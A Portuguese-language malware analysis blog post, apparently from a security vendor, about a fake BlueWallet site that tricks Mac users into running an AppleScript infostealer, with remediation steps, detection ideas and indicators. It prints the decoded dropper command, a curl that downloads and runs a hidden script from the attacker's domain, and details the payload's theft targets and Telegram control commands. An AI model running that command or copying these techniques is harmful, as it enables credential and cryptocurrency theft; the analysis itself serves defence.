Privacy, Golpes, Informações sobre ameaças

A falsa BlueWallet rouba senhas, contas e criptomoedas de computadores Mac

por Stefan Dasic | 1º de junho de 2026
A falsa BlueWallet rouba senhas, contas e criptomoedas de computadores Mac

Um site falso que se faz passar pelo BlueWallet (uma carteira de Bitcoin legítima) está atacando Mac com uma tática simples, mas eficaz. O próprio BlueWallet não foi comprometido. Em vez disso, os cibercriminosos roubaram o nome e a marca da carteira de Bitcoin legítima para fazer com que um download malicioso pareça confiável.

Se você estava procurando uma carteira de criptomoedas e acabou acessando uma dessas páginas falsas de download do BlueWallet, o site tentou induzi-lo a abrir um arquivo baixado em uma ferramenta integrada do macOS e clicar em “Executar”. Se você seguiu essas instruções, o malware poderia roubar senhas salvas, dados de login do navegador, carteiras de criptomoedas, documentos e outros dados confidenciais. Ele também monitora a área de transferência em busca de endereços de carteiras de criptomoedas e pode substituí-los por endereços controlados pelo invasor.

Essa última funcionalidade é particularmente perigosa. Se você copiar o endereço de uma carteira antes de enviar fundos, o malware pode substituí-lo discretamente pelo endereço do invasor. Tudo parece normal na tela, mas o dinheiro vai para outro lugar.

Você deve se preocupar? Só se tiver baixado e executado o arquivo. A simples visita à página e o fechamento dela, por si só, não causam nenhum dano. O ataque depende inteiramente de o usuário abrir o script e clicar em “play”.

Se você tiver executado o programa, considere o computador como comprometido e siga as etapas abaixo.

O que fazer se você tiver executado o programa

Se você abriu o arquivo e clicou em “Reproduzir”, considere que seu dispositivo foi comprometido e siga estas etapas:

  • Desconecte a máquina da rede para interromper o canal de controle
  • Faça uma verificação completa do dispositivo e certifique-se de que está usando um software de segurança atualizado com a proteção na web ativada
  • A partir de outro dispositivo confiável, altere as senhas de todas as contas usadas no Mac, começando pelo e-mail e pelas plataformas de criptomoedas
  • Transfira qualquer criptomoeda para uma nova carteira criada em um dispositivo sem dados
  • Considere as frases-semente e chaves existentes como expostas
  • Antes de enviar criptomoedas no futuro, verifique o endereço de destino completo, caractere por caractere
  • Verifique se há arquivos desconhecidos em ~/Library/LaunchAgents
  • Procure um esconderijo .sysupd.sh arquivo em /tmp
  • Alterne as credenciais da nuvem e do SSH se .ssh, .awsou .gnupg havia arquivos na máquina
  • Em caso de dúvida, faça backup dos seus dados e reinstale o macOS a partir de uma fonte comprovadamente confiável, em vez de tentar fazer uma limpeza no próprio sistema

Comprou algo que não devia?

Técnicas de engenharia social

O aspecto mais interessante desta campanha não é de natureza técnica. Os invasores não invadiram o Mac contornaram as proteções de segurança da Apple. Eles convenceram as vítimas a executarem o malware por conta própria.

O site falso orienta os usuários ao longo do processo com uma página de download convincente, instruções simples e até mesmo um atalho de teclado. O ataque é bem-sucedido porque a vítima confia no que está vendo.

À medida que os sistemas operacionais se tornam mais eficazes no bloqueio de softwares maliciosos, os invasores investem cada vez mais em engenharia social. Em vez de encontrar maneiras de contornar os controles de segurança, eles convencem as pessoas a ignorá-los.

É por isso que um hábito está se tornando cada vez mais importante: desconfie de qualquer download que venha acompanhado de instruções para abri-lo em uma ferramenta de script, utilitário de desenvolvedor ou janela do Terminal e clicar em “Executar”.

Nesta campanha, bastou pressionar uma vez a combinação ⌘R para transformar um Mac um programa capaz de roubar senhas, furtar carteiras de criptomoedas, sequestrar a área de transferência e servir como ferramenta de acesso remoto.

Análise técnica

Primeira etapa: O programa de download do AppleScript

A página está disponível em update-bluewallet[.]com, um nome de domínio bastante semelhante ao da carteira real (bluewallet.io) ao dar uma olhada rápida. A primeira coisa que a página faz é não esperar pelo consentimento. Seu script aciona uma rotina de download com um temporizador de dois segundos assim que a página é carregada, e novamente se o visitante clicar em qualquer um dos dois botões.

O arquivo que é salvo na pasta "Downloads" se chama BlueWallet Installer.applescript, uma extensão que a maioria das pessoas nunca viu e em relação à qual não tem motivos para desconfiar.

Então, a página faz algo discretamente engenhoso. Após um breve intervalo, ela reescreve seu próprio texto de status para que pareça uma instrução de configuração: abra o instalador e, em seguida, pressione o botão de reprodução ou ⌘R. Ela até desenha um pequeno triângulo azul de reprodução no texto, para que a redação corresponda à interface real do Script Editor que a vítima está prestes a ver.

Site falso do BlueWallet que orienta a vítima a baixar e executar o script malicioso

A página orienta a vítima passo a passo sobre o que precisa ser feito para executar o arquivo.

No macOS atual, um aplicativo não assinado baixado da internet é colocado em quarentena e verificado antes de poder ser executado. Um script simples aberto no Editor de Scripts e executado pelo usuário contorna esse processo. O usuário está instruindo manualmente uma ferramenta confiável da Apple a executar o código, portanto, não há nenhuma etapa de certificação que possa falhar.

É por isso que o invasor optou por um AppleScript em vez de um aplicativo empacotado: isso transfere a ação arriscada do sistema operacional para a vítima.

O próprio AppleScript é notavelmente curto. Sem os comentários decorativos, incluindo um número de versão falso e uma linha que alega ser uma “Atualização de Instalação do Brew”, ele executa um único comando de shell codificado em base64 e, em seguida, instrui o Script Editor a fechar sem salvar, removendo as evidências da tela.

Instalação, atualização e manutenção do Brew

Em resumo, esse comando faz o seguinte:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

Ele baixa um segundo script de um servidor remoto, salva-o em um arquivo oculto no diretório temporário, torna-o executável e o executa em segundo plano, suprimindo toda a saída.

A vítima não vê nada. O nome do arquivo .sysupd.sh foi disfarçado para parecer uma atualização do sistema. Trata-se de um dropper em etapas clássico: a primeira etapa é minúscula e descartável, e sua única função é baixar a carga útil real.

Segunda etapa: Análise da carga útil

As primeiras linhas definem como o malware pretende funcionar. Ele define umask 077 de modo que tudo o que ele cria só pode ser lido pelo usuário comprometido; em seguida, cria um diretório de trabalho oculto com nome aleatório em /tmp originário de /dev/urandom.

Sua configuração está ofuscada, mas de forma superficial. Uma pequena função chamada _xd percorre uma sequência hexadecimal dois caracteres por vez e aplica a operação XOR a cada byte em relação a uma chave repetitiva pré-definida: swckR9JCD2Uu.

Essa função decodifica o token do bot do Telegram, o identificador do chat, o token de comando secundário e a URL de teste do script em tempo de execução. Isso é suficiente para burlar ferramentas que procuram apenas sequências de texto simples, mas não muito mais do que isso. Como a chave e o algoritmo estão ambos contidos no arquivo, todos os valores codificados são totalmente recuperáveis.

Um detalhe se destaca: o conteúdo decodificado do chat do Telegram e o conteúdo decodificado do chat de comando e controle são idênticos. O invasor está usando um único canal do Telegram tanto como ponto de exfiltração quanto como canal de controle. É uma solução econômica, escalável, criptografada e que se mistura ao tráfego HTTPS comum.

Nem tudo está ofuscado. Os endereços usados para sequestrar a área de transferência estão no arquivo em texto simples: um endereço de Bitcoin, um endereço de Ethereum e um endereço de Solana. Esses são os endereços que o implante substitui quando detecta que você está copiando um endereço de carteira. Como são públicos em suas respectivas blockchains, eles também estão entre os artefatos mais úteis de toda a amostra.

O que o malware rouba

As rotinas de coleta da segunda etapa são abrangentes. Elas abrangem seis grandes categorias.

1. Navegadores da Web

O script extrai o histórico, os cookies, os dados de login e os favoritos de uma ampla variedade de navegadores, incluindo:

  • Navegadores baseados no Chromium: Google Chrome , Beta, Canary e Dev); Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; e Yandex
  • Navegadores baseados no Firefox: Firefox, Waterfox, Pale Moon, Zen e LibreWolf
  • Dados nativos do navegador do macOS: cookies, histórico e valores de formulários do Safari

2. Carteiras de criptomoedas

Este parece ser o foco principal do roteiro.

Ele é voltado para aplicativos de carteiras para desktop, incluindo Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop e Tonkeeper.

Além disso, tem como alvo carteiras em forma de extensão de navegador em diversos ecossistemas:

  • Bitcoin: Xverse , Leather, UniSat, Alby e Wizz
  • Solana: Phantom , Solflare, Backpack, Nightly, MagicEden, Sollet e Slope
  • Carteiras EVM: MetaMask , Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin e XDEFI
  • Cosmos: Keplr , Station e Cosmostation
  • Outros ecossistemas: Yoroi , Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos e Temple

3. Gerenciadores de senhas e ferramentas de segurança

O malware tem como alvo o armazenamento local e as configurações de vários gerenciadores de senhas, incluindo LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt e Buttercup.

Ele também procura dados associados à autenticação de duas etapas (2FA) e a aplicativos de autenticação, incluindo o Google Authenticator, o Authy, o Duo, o Microsoft Authenticator, o 2FAS e o FreeOTP.

4. Aplicativos de comunicação e redes sociais

O script tenta copiar os dados da sessão e o armazenamento local do Telegram Desktop e do Discord, incluindo o Discord Canary e o Discord PTB.

5. Ferramentas para desenvolvedores e na nuvem

Ele procura credenciais e arquivos de configuração no diretório pessoal do usuário, incluindo:

  • Configurações da AWS CLI em .aws
  • Chaves SSH em .ssh
  • Chaves GnuPG em .gnupg
  • Configurações do Kubernetes em .kube
  • Arquivos Shell e Git, incluindo .zshrc, .zsh_history, .bash_historye .gitconfig

6. Aplicativos de produtividade e arquivos em geral

O script copia o banco de dados local do Apple Notes, NoteStore.sqlite.

Ele também procura dados de extensões de navegador relacionadas a ferramentas de compras e produtividade, incluindo Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist e Google Keep.

Por fim, ele verifica as pastas "Área de Trabalho", "Documentos" e "Downloads" em busca de arquivos com extensões que incluam .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .peme .env, dentro de um limite de tamanho.

O que ele faz com os dados roubados

O malware tenta capturar diretamente a senha da conta do usuário. Um osascript A janela de diálogo intitulada “Preferências do Sistema” solicita que o usuário digite novamente sua senha “para continuar”. O script verifica cada tentativa em relação a dscl . authonly antes de salvá-lo, de modo que ele só pare quando tiver uma credencial válida.

Para a exfiltração, ele arquiva os dados preparados usando o próprio macOS ditto, provavelmente porque está sempre presente, ao contrário de zip. Para não ultrapassar o limite de upload de 50 MB do Telegram, ele divide arquivos maiores em partes de 49 MB com split antes de enviar cada peça.

Isso garante a persistência ao gravar um arquivo plist do LaunchAgent no diretório do usuário ~/Library/LaunchAgents, apoiado por um diretório de suporte oculto, e carregando-o com launchctl para que o implante seja executado novamente a cada vez que você fizer login.

O sequestro da área de transferência é um loop em segundo plano ao vivo. Um clip_watch A função verifica continuamente a área de transferência, identifica formatos de endereços de Bitcoin, Ethereum e Solana por meio de expressões regulares, reporta o endereço original ao canal de comando e controle e substitui o conteúdo da área de transferência pelo endereço do invasor por meio de pbcopy.

Isso significa que a substituição ocorre automaticamente ao copiar e colar.

Por fim, o malware pode ser controlado de forma interativa. A c2_loop consulta o bot do Telegram em busca de comandos e oferece um conjunto completo de ferramentas para operadores:

  • /info para obter detalhes sobre o sistema
  • /exec para comandos arbitrários do shell
  • /clipboard para ler o conteúdo atual da área de transferência
  • /download para selecionar arquivos específicos
  • /exfil para executar novamente o módulo de roubo
  • /selfdestruct para apagar os vestígios

Isso faz com que o canal do Telegram seja um canal de controle remoto em tempo real, e não apenas um canal de comunicação unidirecional.

Vivendo da terra e do Telegram

O padrão aqui é conhecido e está se tornando cada vez mais comum: recorrer a ferramentas nas quais já se confia.

A entrega faz uso indevido do próprio Script Editor da Apple. A configuração se esconde por trás de um XOR simples, em vez de binários compactados. O canal de comando utiliza a API de bots do Telegram, que consegue passar pelos filtros de saída que sinalizariam um servidor desconhecido.

Nenhuma dessas peças é, por si só, algo novo. A eficácia reside na combinação de componentes que parecem legítimos, de modo que nenhuma etapa isolada acione um alarme.

Oportunidades de detecção

As lições aqui tratam menos da isca e mais da própria técnica.

Editor de scripts executando um código Base64 de uma linha do shell script que é encerrado imediatamente é um forte indício comportamental e um alvo de detecção muito melhor do que o arquivo descartável da primeira fase. O mesmo vale para um arquivo oculto /tmp/.sysupd.sh baixado por curl e é executado em segundo plano.

Os navegadores e as plataformas de download poderiam tratar .applescript arquivos provenientes da web com o mesmo grau de desconfiança que os executáveis. E o Telegram continua sendo um meio de comando e controle pouco explorado, cujo uso indevido de tokens de bots poderia ser interrompido na origem por meio de denúncias.

Indicadores de comprometimento

Hashes de arquivo (SHA-256)

  • 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Indicadores de rede

  • update-bluewallet[.]com
  • projects2026box[.]com

Endereços de sequestro da área de transferência

  • BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
  • ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
  • SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

Não nos limitamos a informar sobre as ameaças, nós as removemos

Os riscos de segurança cibernética nunca devem se espalhar além de uma manchete. Mantenha as ameaças longe de seus dispositivos fazendo o download Malwarebytes hoje mesmo.

Sobre o autor

Stefan Dasic

Stefan Dasic

Apaixonado por soluções antivírus, Stefan está envolvido em testes de malware e controle de qualidade de produtos AV desde muito cedo. Como parte da equipe Malwarebytes , Stefan se dedica a proteger os clientes e garantir sua segurança.

ÚLTIMOS ARTIGOS

Notícias
semana em segurança

Uma semana no setor de segurança (maio 25 – maio 31)

Junho 1, 2026

Uma lista dos assuntos que abordamos na semana de 25 a 31 de maio de 2026

Podcast
Um cadeado ilustrado é montado em um suporte de microfone com ondas sonoras emitidas pelo dispositivo.

Os aplicativos de pagamento estão de olho no que você diz (Lock and Code, 7ª temporada, episódio 11)

Maio 31, 2026

Nesta semana, no podcast Lock and Code, conversamos com Rainey Reitman sobre a censura financeira que exclui clientes dos principais aplicativos de pagamento.

Notícias
Logotipo da Signal

Usuários do Signal são alvo de ataques de phishing para roubo de backups

Maio 29, 2026

Os cibercriminosos estão se passando pelo Suporte do Signal para roubar chaves de recuperação de backup, o que lhes dá acesso a todos os arquivos de mensagens das vítimas.

Artigos relacionados

Ícone dos colaboradores

Contribuintes

Ícone da Central de Ameaças

Centro de Ameaças

Ícone de podcasts

Podcast

Ícone do glossário

Glossário

Ícone de golpes

Golpes